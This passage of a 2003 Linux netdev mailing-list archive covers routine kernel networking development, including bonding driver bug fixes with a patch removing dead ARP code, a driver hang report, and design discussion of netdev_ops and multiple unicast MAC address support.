Miller" To: Willy Tarreau Cc: jgarzik@pobox.com, marcelo@conectiva.com.br, netdev@oss.sgi.com, bonding-devel@lists.sourceforge.net, linux-kernel@vger.kernel.org Subject: Re: [PATCH] 2.4.22-pre9-bk : bonding bug fixes Message-Id: <20030730164907.43b2d343.davem@redhat.com> In-Reply-To: <20030730140658.GA14437@alpha.home.local> References: <20030730140658.GA14437@alpha.home.local> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4400 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 30 Jul 2003 16:06:58 +0200 Willy Tarreau wrote: > there are still a few bugs in the current bonding driver. I've reported them > several times now, but perhaps not at the right places... So now we have these few bug fixes, and the backport of the 2.6.x version of the bonding code, both submitted on the same day in fact :-) Jeff I'd recommend we put Willy's fixes in if you think they're OK, then we can think about the 2.6.x backport work for 2.4.23-preX From davem@redhat.com Wed Jul 30 16:56:53 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 16:56:56 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UNurFl022927 for ; Wed, 30 Jul 2003 16:56:53 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id QAA03661; Wed, 30 Jul 2003 16:53:19 -0700 Date: Wed, 30 Jul 2003 16:53:19 -0700 From: "David S. 
Miller" To: Stephen Hemminger Cc: netdev@oss.sgi.com Subject: Re: [PATCH] add likely/unlikely to pskb_may_pull Message-Id: <20030730165319.4354d484.davem@redhat.com> In-Reply-To: <20030730161854.3cb03258.shemminger@osdl.org> References: <20030730161854.3cb03258.shemminger@osdl.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4402 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 30 Jul 2003 16:18:54 -0700 Stephen Hemminger wrote: > Code that deals with received headers needs to be robust and use pskb_may_pull in many > places, but except in the case of DOS attacks, the packets are always correctly formed > so optimize for that case. Applied, thanks Stephen. From fubar@us.ibm.com Wed Jul 30 17:22:54 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 17:23:00 -0700 (PDT) Received: from e31.co.us.ibm.com (e31.co.us.ibm.com [32.97.110.129]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6V0MlFl025475 for ; Wed, 30 Jul 2003 17:22:54 -0700 Received: from westrelay02.boulder.ibm.com (westrelay02.boulder.ibm.com [9.17.195.11]) by e31.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6V0MWRZ207332; Wed, 30 Jul 2003 20:22:33 -0400 Received: from death.ibm.com (d03av02.boulder.ibm.com [9.17.193.82]) by westrelay02.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6V0MT8Z179614; Wed, 30 Jul 2003 18:22:31 -0600 Received: from us.ibm.com (fubar@localhost) by death.ibm.com (8.12.5/8.12.5/Submit) with ESMTP id h6V0MGjK012821; Wed, 30 Jul 2003 17:22:17 -0700 Message-Id: <200307310022.h6V0MGjK012821@death.ibm.com> X-Authentication-Warning: death.ibm.com: fubar owned process doing -bs To: "David S. 
Miller" cc: Willy Tarreau , jgarzik@pobox.com, marcelo@conectiva.com.br, netdev@oss.sgi.com, bonding-devel@lists.sourceforge.net, linux-kernel@vger.kernel.org Subject: Re: [PATCH] 2.4.22-pre9-bk : bonding bug fixes In-Reply-To: Message from "David S. Miller" of "Wed, 30 Jul 2003 16:49:07 PDT." <20030730164907.43b2d343.davem@redhat.com> Date: Wed, 30 Jul 2003 17:22:15 -0700 From: Jay Vosburgh X-archive-position: 4403 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: fubar@us.ibm.com Precedence: bulk X-list: netdev >On Wed, 30 Jul 2003 16:06:58 +0200 >Willy Tarreau wrote: > >> there are still a few bugs in the current bonding driver. I've reported them >> several times now, but perhaps not at the right places... > >So now we have these few bug fixes, and the backport of the >2.6.x version of the bonding code, both submitted on the same >day in fact :-) > >Jeff I'd recommend we put Willy's fixes in if you think they're >OK, then we can think about the 2.6.x backport work for 2.4.23-preX I've been looking at Willy's fixes, and the typo (first patch) and locking fix (third patch) both look good to me. The second patch (the dead code warning) points out a real problem, in that the code in question really has no function, but the patch probably doesn't go far enough for a final solution (the variable that code would set, arp_target_hw_addr, is referenced in other places, but ends up always being NULL because the dead code is the only place it was ever set). A more proper solution would be to simply delete the dead code and the arp_target_hw_addr variable, and replace the variable references with NULL. This means that all of the ARP probes sent will be sent out as broadcasts, which is what's already happening, this just makes the code clearer. Patch follows (which replaces Willy's second patch). Does this sound reasonable to everybody? 
-J --- -Jay Vosburgh, IBM Linux Technology Center, fubar@us.ibm.com --- linux-2.4.22-pre9-bk-wt/drivers/net/bonding/bond_main.c 2003-07-30 17:06:50.000000000 -0700 +++ linux-2.4.22-pre9-bk/drivers/net/bonding/bond_main.c 2003-07-30 17:08:53.000000000 -0700 @@ -463,7 +463,6 @@ static unsigned long arp_target[MAX_ARP_IP_TARGETS] = { 0, } ; static int arp_ip_count = 0; static u32 my_ip = 0; -char *arp_target_hw_addr = NULL; static char *primary= NULL; @@ -596,8 +595,7 @@ for (i = 0; (idev, - my_ip, arp_target_hw_addr, slave->dev->dev_addr, - arp_target_hw_addr); + my_ip, NULL, slave->dev->dev_addr, NULL); } } @@ -1031,10 +1029,6 @@ } if (arp_interval> 0) { /* arp interval, in milliseconds. */ del_timer(&bond->arp_timer); - if (arp_target_hw_addr != NULL) { - kfree(arp_target_hw_addr); - arp_target_hw_addr = NULL; - } } if (bond_mode == BOND_MODE_8023AD) { @@ -3281,28 +3275,6 @@ memcpy(&my_ip, the_ip, 4); } - /* if we are sending arp packets and don't know - * the target hw address, save it so we don't need - * to use a broadcast address. - * don't do this if in active backup mode because the slaves must - * receive packets to stay up, and the only ones they receive are - * broadcasts. 
- */ - if ( (bond_mode != BOND_MODE_ACTIVEBACKUP) && - (arp_ip_count == 1) && - (arp_interval > 0) && (arp_target_hw_addr == NULL) && - (skb->protocol == __constant_htons(ETH_P_IP) ) ) { - struct ethhdr *eth_hdr = - (struct ethhdr *) (((char *)skb->data)); - struct iphdr *ip_hdr = (struct iphdr *)(eth_hdr + 1); - - if (arp_target[0] == ip_hdr->daddr) { - arp_target_hw_addr = kmalloc(ETH_ALEN, GFP_KERNEL); - if (arp_target_hw_addr != NULL) - memcpy(arp_target_hw_addr, eth_hdr->h_dest, ETH_ALEN); - } - } - read_lock(&bond->lock); read_lock(&bond->ptrlock); From davem@redhat.com Wed Jul 30 17:38:40 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 17:38:46 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6V0cVFl026828 for ; Wed, 30 Jul 2003 17:38:38 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id RAA03900; Wed, 30 Jul 2003 17:33:49 -0700 Date: Wed, 30 Jul 2003 17:33:49 -0700 From: "David S. 
Miller" To: Stephen Hemminger Cc: klassert@mathematik.tu-chemnitz.de, christian@mautner.ca, akpm@digeo.com, netdev@oss.sgi.com Subject: Re: [PATCH] Fix bridge notification processing Message-Id: <20030730173349.7f9db1b7.davem@redhat.com> In-Reply-To: <20030729170715.7ff9bbc7.shemminger@osdl.org> References: <20030722234508.0af40e80.shemminger@osdl.org> <20030724033430.GA20304@mautner.ca> <20030724102821.GA32274@gareth.mathematik.tu-chemnitz.de> <20030729170715.7ff9bbc7.shemminger@osdl.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4404 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev Stephen I don't know which of all these patches to apply to fix the bridge timer bug and this notification stuff. Can you please send me specific patches to apply? Thanks. 
From joshua.schichtel@foonet.net Wed Jul 30 17:45:20 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 17:45:27 -0700 (PDT) Received: from fed1mtao01.cox.net (fed1mtao01.cox.net [68.6.19.244]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6V0jKFl027578 for ; Wed, 30 Jul 2003 17:45:20 -0700 Received: from k6m1g2 ([68.2.80.179]) by fed1mtao01.cox.net (InterMail vM.5.01.04.05 201-253-122-122-105-20011231) with SMTP id <20030731004511.TQPA7643.fed1mtao01.cox.net@k6m1g2> for ; Wed, 30 Jul 2003 20:45:11 -0400 Message-ID: <000a01c356fc$efb6ae60$6400a8c0@k6m1g2> From: "Joshua Schichtel" To: Subject: sis900 driver problem (redhat kernels) Date: Wed, 30 Jul 2003 17:44:44 -0700 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0007_01C356C2.42EB58F0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1158 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 X-archive-position: 4405 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: joshua.schichtel@foonet.net Precedence: bulk X-list: netdev This is a multi-part message in MIME format. ------=_NextPart_000_0007_01C356C2.42EB58F0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable We have several machines with an on-board sis900 NIC. Under heavy utilization it just quits working: no traffic passes at all. To fix it we have to run service network restart (Red Hat), or bring eth0 down and up again with ifconfig. We tried several Red Hat 8 kernels (2.4.18, 2.4.20) with various patch levels, and all have the same problem. I haven't tried 2.4.21 yet, but I looked at the source and there aren't any significant changes. This is reproducible, so I'd be happy to test any patches :-) If you need any information from the machines themselves, let me know and I will reply.
-Joshua Schichtel joshua.schichtel@foonet.net Creative Internet Techniques ------=_NextPart_000_0007_01C356C2.42EB58F0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
------=_NextPart_000_0007_01C356C2.42EB58F0-- From willy@w.ods.org Wed Jul 30 22:04:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 22:04:29 -0700 (PDT) Received: from www.home.local (willy.net1.nerim.net [62.212.114.60]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6V54EFl013402 for ; Wed, 30 Jul 2003 22:04:15 -0700 Received: from alpha.home.local (alpha [10.0.1.2]) by www.home.local (8.12.1/8.12.1) with ESMTP id h6V53fpn030597; Thu, 31 Jul 2003 07:03:41 +0200 Received: (from willy@localhost) by alpha.home.local (8.12.4/8.12.1) id h6V53dAc024779; Thu, 31 Jul 2003 07:03:39 +0200 Date: Thu, 31 Jul 2003 07:03:39 +0200 From: Willy Tarreau To: Jay Vosburgh Cc: "David S. Miller" , Willy Tarreau , jgarzik@pobox.com, marcelo@conectiva.com.br, netdev@oss.sgi.com, bonding-devel@lists.sourceforge.net, linux-kernel@vger.kernel.org Subject: Re: [PATCH] 2.4.22-pre9-bk : bonding bug fixes Message-ID: <20030731050339.GA24641@alpha.home.local> References: <20030730164907.43b2d343.davem@redhat.com> <200307310022.h6V0MGjK012821@death.ibm.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200307310022.h6V0MGjK012821@death.ibm.com> User-Agent: Mutt/1.4i X-archive-position: 4406 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: willy@w.ods.org Precedence: bulk X-list: netdev Hi Jay ! On Wed, Jul 30, 2003 at 05:22:15PM -0700, Jay Vosburgh wrote: > I've been looking at Willy's fixes, and the typo (first patch) > and locking fix (third patch) both look good to me. The second patch > (the dead code warning) points out a real problem, in that the code in > question really has no function, but the patch probably doesn't go far > enough for a final solution (the variable that code would set, > arp_target_hw_addr, is referenced in other places, but ends up always > being NULL because the dead code is the only place it was ever set). 
> > A more proper solution would be to simply delete the dead code > and the arp_target_hw_addr variable, and replace the variable > references with NULL. This means that all of the ARP probes sent will > be sent out as broadcasts, which is what's already happening, this > just makes the code clearer. Patch follows (which replaces Willy's > second patch). > > Does this sound reasonable to everybody? Perfectly reasonable to me. My patch was not intended to fix it but to allow anybody to comment on this code, which would not have been possible if I removed it myself ;-) IMHO, ARP probes should always be sent with broadcast addresses. We could think about switching to unicast when we get a reply, but we must switch back to broadcast as soon as we lose a target. This would complexify the magic which is not absolutely necessary here. I might send other fix propositions later (2.4.23-pre) for the ARP behaviour (better IP source address selection, etc...) because I don't like it very much when drivers try to find their information themselves and stick to it for all their life (eg: my_ip). I'd like to dynamically lookup the valid source IP at each probe (which is not *that* frequent in fact). Cheers, Willy From davem@redhat.com Wed Jul 30 22:06:41 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 22:06:46 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6V56eFl013824 for ; Wed, 30 Jul 2003 22:06:41 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id WAA04168; Wed, 30 Jul 2003 22:02:23 -0700 Date: Wed, 30 Jul 2003 22:02:23 -0700 From: "David S. 
Miller" To: Krishna Kumar Cc: kuznet@ms2.inr.ac.ru, yoshfuji@linux-ipv6.org, netdev@oss.sgi.com Subject: Re: O/M flags against 2.6.0-test1 Message-Id: <20030730220223.4c25fcfe.davem@redhat.com> In-Reply-To: References: <20030724000705.4662df54.davem@redhat.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4407 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 29 Jul 2003 17:33:03 -0700 (PDT) Krishna Kumar wrote: > Since use_tempaddr can be -1, I am for the time being keeping all > the variables as s32. If this is changed to __u32, then some code in > addrconf.c needs to be modified. Ok, but then please use "__s32". > > I think something more like route metrics, ie. an array is more appropriate > > I guess you mean only the user interface to use route type metrics, not > modify the existing cnf implementation to use this concept (eg remove the > structure and define cnf_metrics[] with code similar to RTAX_HOPLIMIT, > etc). So this patch doesn't change the usage in kernel, except now the > user interface returns the config params in an array format. > > This patch applies on top of the prefix list patch. I like the array scheme, but please you must define macros (like RTAX_*) that give meaning to the array[] indices. 
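As an illustration of the request above, here is a minimal user-space sketch of named indices for a config array, in the spirit of the RTAX_* constants. All EX_CNF_* names, the struct and the helper are hypothetical and are not taken from any posted patch; int32_t stands in for the kernel's __s32.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical index names (assumption): each one gives a meaning to
 * one slot of the exported array, the way RTAX_* does for metrics. */
enum ex_cnf_index {
    EX_CNF_FORWARDING = 0,
    EX_CNF_HOPLIMIT,
    EX_CNF_USE_TEMPADDR,
    EX_CNF_MAX              /* number of slots, must stay last */
};

/* Hypothetical stand-in for the existing per-device config structure.
 * Fields are signed because use_tempaddr can be -1. */
struct ex_cnf {
    int32_t forwarding;
    int32_t hop_limit;
    int32_t use_tempaddr;
};

/* Copy the structure into an array addressed by the named indices.
 * Returns the number of slots written, or 0 if the buffer is too small. */
static size_t ex_cnf_to_array(const struct ex_cnf *cnf, int32_t *out, size_t len)
{
    if (len < (size_t)EX_CNF_MAX)
        return 0;
    out[EX_CNF_FORWARDING]   = cnf->forwarding;
    out[EX_CNF_HOPLIMIT]     = cnf->hop_limit;
    out[EX_CNF_USE_TEMPADDR] = cnf->use_tempaddr;
    return (size_t)EX_CNF_MAX;
}
```

With this layout a reader of the array looks up out[EX_CNF_HOPLIMIT] rather than a bare number, and new parameters can be appended before EX_CNF_MAX without renumbering the existing ones.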
From willy@www.linux.org.uk Thu Jul 31 04:12:45 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 31 Jul 2003 04:12:53 -0700 (PDT) Received: from www.linux.org.uk (IDENT:DJ19fHNGhXHb6DApD4d8+s+Qj4yRYdUQ@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6VBCiFl009750 for ; Thu, 31 Jul 2003 04:12:45 -0700 Received: from willy by www.linux.org.uk with local (Exim 4.14) id 19iBMP-0007lI-Gv; Thu, 31 Jul 2003 12:12:41 +0100 Date: Thu, 31 Jul 2003 12:12:41 +0100 From: Matthew Wilcox To: "David S. Miller" Cc: Arnaldo Carvalho de Melo , willy@debian.org, netdev@oss.sgi.com Subject: Re: netdev_ops retraction Message-ID: <20030731111241.GJ22222@parcelfarce.linux.theplanet.co.uk> References: <20030730184416.GI22222@parcelfarce.linux.theplanet.co.uk> <20030730233541.GB7057@conectiva.com.br> <20030730164108.06062b72.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030730164108.06062b72.davem@redhat.com> User-Agent: Mutt/1.4.1i X-archive-position: 4408 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: willy@debian.org Precedence: bulk X-list: netdev On Wed, Jul 30, 2003 at 04:41:08PM -0700, David S. Miller wrote: > I'm ok with the simplified ethtool-only version too. > > Although I'm confused about what kind of problem there is with > netdev_ops being such a "large structure". Hard to understand/keep track of is my main concern. There was also a namespace collision -- two functions called get_stats. It's now get_ethtool_stats. > This is the kind of thing there'd be _ONE_ copy of in each driver, > ala. > > struct netdev_ops tg3_netdev_ops { > ... > .foo = tg3_foo, > ... > }; > > ... > tp->dev->netdev_ops = &tg3_netdev_ops; > ... > > Right? I'm glad you mentioned tg3 as an example, since it's one of the ones where this isn't true. 
if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5700) tp->dev->hard_start_xmit = tg3_start_xmit_4gbug; else tp->dev->hard_start_xmit = tg3_start_xmit; I fixed this with two netdev_ops structs, but imagine a driver with two or three more cases like this and everything starts to look quite nasty. I do think we want to do netdev_ops, but not now, and let's keep netdev_ops and ethtool_ops separate. -- "It's not Hollywood. War is real, war is primarily not about defeat or victory, it is about death. I've seen thousands and thousands of dead bodies. Do you think I want to have an academic debate on this subject?" -- Robert Fisk From rickp@rossfell.co.uk Thu Jul 31 06:15:26 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 31 Jul 2003 06:15:35 -0700 (PDT) Received: from rolf.rossfell.co.uk (rolf.rossfell.co.uk [81.2.65.139]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6VDFEFl019295 for ; Thu, 31 Jul 2003 06:15:15 -0700 Received: from fozzy.rossfell.co.uk (fozzy.rossfell.co.uk [81.2.65.138]) by rolf.rossfell.co.uk (Postfix) with ESMTP id 204796422B for ; Thu, 31 Jul 2003 13:49:24 +0100 (BST) Date: Thu, 31 Jul 2003 13:49:19 +0100 From: Rick Payne To: netdev@oss.sgi.com Subject: multiple unicast mac address (was Re: netdev_ops retraction) Message-ID: <2147483647.1059659359@fozzy.rossfell.co.uk> In-Reply-To: <20030730184416.GI22222@parcelfarce.linux.theplanet.co.uk> References: <20030730184416.GI22222@parcelfarce.linux.theplanet.co.uk> X-Mailer: Mulberry/3.0.3 (Mac OS X) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline X-archive-position: 4409 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: rickp@rossfell.co.uk Precedence: bulk X-list: netdev --On Wednesday, July 30, 2003 7:44 pm +0100 Matthew Wilcox wrote: > + void (*set_multicast_list)(struct net_device *dev); > + int (*set_mac_address)(struct net_device 
*dev, void *addr); Talking of which - is there any appetite for a patch that allows multiple unicast MAC addresses to be set on an ethernet interface? It's certainly much neater for things like VRRP and HA stuff if an ethernet device is able to continue accepting packets for its original MAC address, as well as the 'virtual MAC address'. Obviously I'm not talking about generated packets (they will still take the MAC address from dev->dev_addr) - I'm talking about the hardware filter on the ethernet cards themselves. (In some cases, the software concerned may want to call set_mac_address - thus updating dev->dev_addr - and then also add the original MAC address to the 'unicast accept list', for instance.) Some ethernet cards seem to support this and don't care what MAC addresses get put in the multicast list - and I've used that technique before (on cards such as the eepro100 for instance). Others may have a different, not currently used method to set multiple unicast MAC addresses. Finally, as a worst last case - a card could go into promiscuous mode and filter in software. Should I just start on a patch and submit it here for comment?
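The software fallback mentioned above (promiscuous mode plus filtering in software) could look roughly like the following user-space sketch. It is only an illustration under stated assumptions: the ex_* names, the fixed-size list and its capacity are hypothetical, not an existing kernel interface, and only unicast destination matching is shown.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define EX_ETH_ALEN    6   /* length of an ethernet address */
#define EX_MAX_UNICAST 4   /* arbitrary capacity for this sketch */

/* Hypothetical 'unicast accept list' kept alongside the device. */
struct ex_unicast_list {
    uint8_t addr[EX_MAX_UNICAST][EX_ETH_ALEN];
    size_t  count;
};

/* Add one MAC address to the accept list; fails when the list is full. */
static bool ex_unicast_add(struct ex_unicast_list *list, const uint8_t *mac)
{
    if (list->count >= EX_MAX_UNICAST)
        return false;
    memcpy(list->addr[list->count], mac, EX_ETH_ALEN);
    list->count++;
    return true;
}

/* Software filter: the destination MAC is the first six bytes of the
 * frame; accept the frame only if it matches an entry in the list. */
static bool ex_unicast_match(const struct ex_unicast_list *list,
                             const uint8_t *frame, size_t len)
{
    size_t i;

    if (len < EX_ETH_ALEN)
        return false;
    for (i = 0; i < list->count; i++) {
        if (memcmp(list->addr[i], frame, EX_ETH_ALEN) == 0)
            return true;
    }
    return false;
}
```

A driver using this approach would add both the original address and the virtual one to the list, so frames for either keep being accepted after dev->dev_addr changes.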
Rick From lmb@suse.de Thu Jul 31 06:55:59 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 31 Jul 2003 06:56:06 -0700 (PDT) Received: from mx.in-addr.de (gate.in-addr.de [212.8.193.158]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6VDtmFl023821 for ; Thu, 31 Jul 2003 06:55:49 -0700 Received: by mx.in-addr.de (mx.in-addr.de, from userid 10) id 1DB2213C8; Thu, 31 Jul 2003 15:27:53 +0200 (CEST) Received: by hermes.in-addr.de (Postfix, from userid 500) id 87D1BB4C; Thu, 31 Jul 2003 15:27:45 +0200 (CEST) Date: Thu, 31 Jul 2003 15:27:45 +0200 From: Lars Marowsky-Bree To: Rick Payne , netdev@oss.sgi.com Subject: Re: multiple unicast mac address (was Re: netdev_ops retraction) Message-ID: <20030731132745.GQ29577@marowsky-bree.de> References: <20030730184416.GI22222@parcelfarce.linux.theplanet.co.uk> <2147483647.1059659359@fozzy.rossfell.co.uk> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="DXIF1lRUlMsbZ3S1" Content-Disposition: inline In-Reply-To: <2147483647.1059659359@fozzy.rossfell.co.uk> User-Agent: Mutt/1.4i X-Ctuhulu: HASTUR X-archive-position: 4410 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: lmb@suse.de Precedence: bulk X-list: netdev --DXIF1lRUlMsbZ3S1 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On 2003-07-31T13:49:19, Rick Payne said: > Some ethernet cards seem to support this and don't care what MAC addresses > get put in the multicast list - and I've used that technique before (on > cards such as the eepro100 for instance). Others may have a different, not > currently used method to set multiple unicast MAC addresses. Finally, as a > worst last case - a card could go into promiscuous mode and filter in > software. > > Should I just start on a patch and submit it here for comment? Please do.
Sincerely, Lars Marowsky-Br=E9e --=20 SuSE Labs - Research & Development, SuSE Linux AG =20 "If anything can go wrong, it will." "Chance favors the prepared (mind)." -- Capt. Edward A. Murphy -- Louis Pasteur --DXIF1lRUlMsbZ3S1 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (GNU/Linux) iD8DBQE/KRlQudf3XQV4S2cRArrwAJ40JywXivobQaFGH0tQ6+4ry25/+QCggzHr zk/k2btBhP8sMaGWkLyWUR0= =F4R8 -----END PGP SIGNATURE----- --DXIF1lRUlMsbZ3S1-- From chas@locutus.cmf.nrl.navy.mil Thu Jul 31 07:27:23 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 31 Jul 2003 07:27:34 -0700 (PDT) Received: from ginger.cmf.nrl.navy.mil (ginger.cmf.nrl.navy.mil [134.207.10.161]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6VERMFl026915 for ; Thu, 31 Jul 2003 07:27:22 -0700 Received: from locutus.cmf.nrl.navy.mil (locutus.cmf.nrl.navy.mil [134.207.10.66]) by ginger.cmf.nrl.navy.mil (8.12.7/8.12.7) with ESMTP id h6VERHsG023837; Thu, 31 Jul 2003 10:27:17 -0400 (EDT) Message-Id: <200307311427.h6VERHsG023837@ginger.cmf.nrl.navy.mil> To: "David S. Miller" cc: hch@infradead.org, netdev@oss.sgi.com Reply-To: chas3@users.sourceforge.net Subject: Re: [PATCH][ATM][2.4] export try_atm_clip_ops not atm_clip_ops_mutex In-reply-to: Your message of "Wed, 30 Jul 2003 15:58:44 PDT." <20030730155844.43ca22d9.davem@redhat.com> Date: Thu, 31 Jul 2003 10:24:34 -0400 From: chas williams X-Spam-Score: () hits=-0.9 X-Virus-Scanned: NAI Completed X-Scanned-By: MIMEDefang 2.30 (www . roaringpenguin . com / mimedefang) X-archive-position: 4411 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: chas@cmf.nrl.navy.mil Precedence: bulk X-list: netdev In message <20030730155844.43ca22d9.davem@redhat.com>,"David S. Miller" writes: >I really don't consider this critical at all. 
And itsy bitsy fixes
>like this continually pouring into Marcelo's tree in late stages are
>why his releases get delayed for so long, and I'm not going to
>contribute to that problem.

fine with me. like i said, i am not pressed about it.

From jgarzik@pobox.com Thu Jul 31 07:44:22 2003
Received: with ECARTIS (v1.0.0; list netdev); Thu, 31 Jul 2003 07:44:31 -0700 (PDT)
Received: from www.linux.org.uk (IDENT:nOL8VGTw8Px86pjv4l2MtFCVRmCuchm2@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6VEiKFl028478 for ; Thu, 31 Jul 2003 07:44:22 -0700
Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19iEfD-0002qJ-GY; Thu, 31 Jul 2003 15:44:19 +0100
Message-ID: <3F292B38.4070508@pobox.com>
Date: Thu, 31 Jul 2003 10:44:08 -0400
From: Jeff Garzik
Organization: none
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk
X-Accept-Language: en
MIME-Version: 1.0
To: Rick Payne
CC: netdev@oss.sgi.com
Subject: Re: multiple unicast mac address (was Re: netdev_ops retraction)
References: <20030730184416.GI22222@parcelfarce.linux.theplanet.co.uk> <2147483647.1059659359@fozzy.rossfell.co.uk>
In-Reply-To: <2147483647.1059659359@fozzy.rossfell.co.uk>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-archive-position: 4412
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: jgarzik@pobox.com
Precedence: bulk
X-list: netdev

Rick Payne wrote:
>
> --On Wednesday, July 30, 2003 7:44 pm +0100 Matthew Wilcox
> wrote:
>
>> + void (*set_multicast_list)(struct net_device *dev);
>> + int (*set_mac_address)(struct net_device *dev, void *addr);
>
>
> Talking of which - is there any appetite for a patch that allows
> multiple unicast mac addresses to be set on an ethernet interface? It's
> certainly much neater for things like VRRP and HA stuff if an ethernet
> device is able to continue accepting packets for its original MAC
> address, as well as the 'virtual MAC address'.
>
> Obviously I'm not talking about generated packets (they will still take
> the MAC address from dev->dev_addr) - I'm talking about the hardware
> filter on the ethernet cards themselves. (In some cases, the software
> concerned may want to set_mac_address - thus updating dev->dev_addr, and
